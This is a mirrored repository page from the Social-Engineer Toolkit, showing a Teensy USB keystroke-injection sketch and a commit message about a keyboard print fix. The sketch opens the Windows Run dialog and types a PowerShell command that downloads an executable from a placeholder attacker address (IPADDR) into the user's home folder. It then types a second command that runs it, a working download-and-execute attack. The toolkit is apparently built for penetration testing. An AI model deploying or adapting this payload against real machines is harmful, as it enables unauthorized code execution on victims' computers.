mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-12-16 07:52:32 +00:00
473fdde05e
This fix addresses a bug where the old ascii_println function misses the first and last character of each line. Teensyduino/Arduino IDE appears to have added a `Keyboard` class that has a `println` method. This method seems to reliably send all keystrokes to the target and at a seemingly faster rate.
35 lines
955 B
Text
35 lines
955 B
Text
//
|
|
// Social-Engineer Toolkit Teensy Attack Vector
|
|
// Written by: Dave Kennedy (ReL1K) and Josh Kelley (WinFaNG)
|
|
//
|
|
// Special thanks to: Irongeek
|
|
//
|
|
// 2011-02-28 padzero@gmail.com
|
|
// * Added "ALT code" print functions (ascii_*): Fixed payload execution on non-english keymap targets
|
|
// * Change path from C:\ to %HOMEPATH%: Fixed payload execution on Windows 7
|
|
//
|
|
|
|
char *command1 = "powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://IPADDR/x.exe';$file = ' %HOMEPATH%\\x.exe ';$clnt.DownloadFile($url,$file);";
|
|
char *command2 = "%HOMEPATH%\\x.exe";
|
|
|
|
void setup() {
|
|
delay(5000);
|
|
omg(command1);
|
|
delay(15000);
|
|
// run this executable
|
|
omg(command2);
|
|
}
|
|
|
|
void loop() {}
|
|
|
|
void omg(char *SomeCommand)
|
|
{
|
|
Keyboard.set_modifier(128);
|
|
Keyboard.set_key1(KEY_R);
|
|
Keyboard.send_now();
|
|
Keyboard.set_modifier(0);
|
|
Keyboard.set_key1(0);
|
|
Keyboard.send_now();
|
|
delay(1500);
|
|
Keyboard.println(SomeCommand);
|
|
}
|